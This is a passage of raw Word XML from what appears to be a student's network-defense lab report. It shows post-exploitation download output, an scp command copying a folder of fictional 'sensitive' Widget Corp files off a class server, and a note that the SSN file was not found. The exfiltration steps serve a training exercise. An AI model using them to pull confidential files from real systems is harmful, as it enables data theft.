          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> downloading: Engineering Schematics (sensitive!)\Widgets-ng engineering schematic part 8.png -&gt; Engineering Schematics (sensitive!)/Widgets-ng engineering schematic part 8.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636F885D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u w:color="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B1415F">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="400BD9"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t>[*]</w:t>
      </w:r>
      <w:r w:rsidRPr="00B1415F">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> download   : Engineering Schematics (sensitive!)\Widgets-ng engineering schematic part 8.png -&gt; Engineering Schematics (sensitive!)/Widgets-ng engineering schematic part 8.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4EBA71" w14:textId="77777777" w:rsidR="007C13DF" w:rsidRDefault="007C13DF" w:rsidP="00CC2EE4"/>
    <w:p w14:paraId="2D763042" w14:textId="77777777" w:rsidR="007C13DF" w:rsidRDefault="007C13DF" w:rsidP="00CC2EE4"/>
    <w:p w14:paraId="01D3B78E" w14:textId="6C8B17C3" w:rsidR="006B5710" w:rsidRDefault="00B1415F" w:rsidP="00CC2EE4">
      <w:r>
        <w:t>Move all in a single folder and copy to the local machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542D6511" w14:textId="77777777" w:rsidR="00B1415F" w:rsidRDefault="00B1415F" w:rsidP="00CC2EE4"/>
    <w:p w14:paraId="6C24E5BB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>MacBook-Pro-2:~ Rajat$ scp -r -P52525 csci6907@class.tiwaz.net:/home/csci6907/cnd ~/Desktop/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8E259A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csci6907@class.tiwaz.net's password: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4569BA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Legacy business plan.png                                                                                                                     100%  131KB 130.9KB/s   00:00    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F5C3D0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Visit from the Bobs.png                                                                                                                      100%  320KB 319.9KB/s   00:00    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A65C1BA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Project plan for Q2 2015.png                                                                                                                 100%  308KB 308.5KB/s   00:00    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC5DB21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Competitive synergistic consolidation strategy.png                                                                                           100%  162KB 161.7KB/s   00:01    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7463AC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Q4 marketing plan (kinda a big deal).png                                                                                                     100%  232KB 231.6KB/s   00:00    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4520796D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WIDGET-CORP Strategic Plan.png                                                                                                               100%  195KB 195.0KB/s   00:01    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DF306E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Widgets Online Activity House.png                                                                                                            100%  253KB 253.5KB/s   00:00    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525199AB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New facility physical plant security strategy.png                                                                                            100%  189KB 189.4KB/s   00:00    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F810752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(sensitive) Project overview and milestones.png                                                                                              100%  266KB 265.8KB/s   00:00    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3402923B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Corporate Profile - CTO.png                                                                                                                  100%  229KB 229.0KB/s   00:00    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B0B92C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Corporate Profile - CIO.png                                                                                                                  100%  379KB 378.6KB/s   00:00    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BCC1B9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Employee of the Month award winner.png                                                                                                       100%   87KB  87.2KB/s   00:00    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B60AFE6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Corporate Profile - Widgeteer.png                                                                                                            100%  169KB 169.3KB/s   00:00    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1748CE4B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Corporate Profile - President.png                                                                                                            100%  184KB 183.6KB/s   00:00    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1ECE83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Future promotional materials.png                                                                                                             100%  238KB 237.8KB/s   00:00    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE56B6E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Human Resources Strategy.png                                                                                                                 100%  277KB 277.5KB/s   00:00    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B572DC1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Company retreat flier v1.png                                                                                                                 100%  281KB 281.1KB/s   00:00    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A833A4E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Aniversary Party Flier v2.png                                                                                                                100%  296KB 295.6KB/s   00:00    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6760791B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Aniversary Party Flier v1.png                                                                                                                100%  384KB 384.2KB/s   00:00    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B12F88A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Telework Strategy.png                                                                                                                        100%  520KB 519.9KB/s   00:00    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D5D061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Company retreat flier v2.png                                                                                                                 100%  363KB 363.1KB/s   00:00    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A7D1A9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College internship program.png                                                                                                               100%  288KB 288.5KB/s   00:00    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B23119F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Widget Corp IPO initial price projection.png                                                                                                 100%  355KB 354.6KB/s   00:00    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B67B058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Widget Corp IPO Documentation.png                                                                                                            100%  299KB 299.2KB/s   00:00    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E4E08F" w14:textId="77777777" w:rsidR="00B1415F" w:rsidRPr="00B1415F" w:rsidRDefault="00B1415F" w:rsidP="00B141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B1415F">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">IRS Audit Defense Plan.png                                                                                                                   100%  341KB 341.4KB/s   00:00    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1B84D5" w14:textId="77777777" w:rsidR="00B1415F" w:rsidRDefault="00B1415F" w:rsidP="00CC2EE4"/>
    <w:p w14:paraId="5A378CBA" w14:textId="77777777" w:rsidR="00500314" w:rsidRDefault="00500314" w:rsidP="00CC2EE4"/>
    <w:p w14:paraId="201E999C" w14:textId="6994B665" w:rsidR="00500314" w:rsidRDefault="00500314" w:rsidP="00CC2EE4">
      <w:r>
        <w:t>I was not able to find the SSN File, I guess its in one of the systems but the few that I tried searching didn’t result in anything.</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="00500314" w:rsidSect="006D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6478A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="97CAC25A"/>
    <w:lvl w:ilvl="0" w:tplc="CF20B0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E437B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9E42E0B2"/>
    <w:lvl w:ilvl="0" w:tplc="D7FEB6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9E"/>
    <w:rsid w:val="00012BD6"/>
    <w:rsid w:val="0015687E"/>
    <w:rsid w:val="001C088F"/>
    <w:rsid w:val="001E1A57"/>
    <w:rsid w:val="0021780C"/>
    <w:rsid w:val="00247D8F"/>
    <w:rsid w:val="00282CCC"/>
    <w:rsid w:val="00392D72"/>
    <w:rsid w:val="00400C71"/>
    <w:rsid w:val="00435920"/>
    <w:rsid w:val="00443325"/>
    <w:rsid w:val="00500314"/>
    <w:rsid w:val="005439E5"/>
    <w:rsid w:val="006B5710"/>
    <w:rsid w:val="006D403A"/>
    <w:rsid w:val="007C13DF"/>
    <w:rsid w:val="00814374"/>
    <w:rsid w:val="00856141"/>
    <w:rsid w:val="00930BAD"/>
    <w:rsid w:val="00947AF9"/>
    <w:rsid w:val="00B1415F"/>
    <w:rsid w:val="00CB2AD5"/>
    <w:rsid w:val="00CC2EE4"/>
    <w:rsid w:val="00DB6760"/>
    <w:rsid w:val="00DE189E"/>
    <w:rsid w:val="00E41374"/>
    <w:rsid w:val="00F67E6A"/>
    <w:rsid w:val="00FC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6CE4F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A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5E2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E2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4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1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8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2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3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9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4448</Words>
  <Characters>25358</Characters>
  <Application>Microsoft Macintosh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Vij</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Rajat Vij</cp:lastModifiedBy>
  <cp:revision>10</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-03-02T19:43:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-03-10T07:44:00Z</dcterms:modified>
</cp:coreProperties>
</file>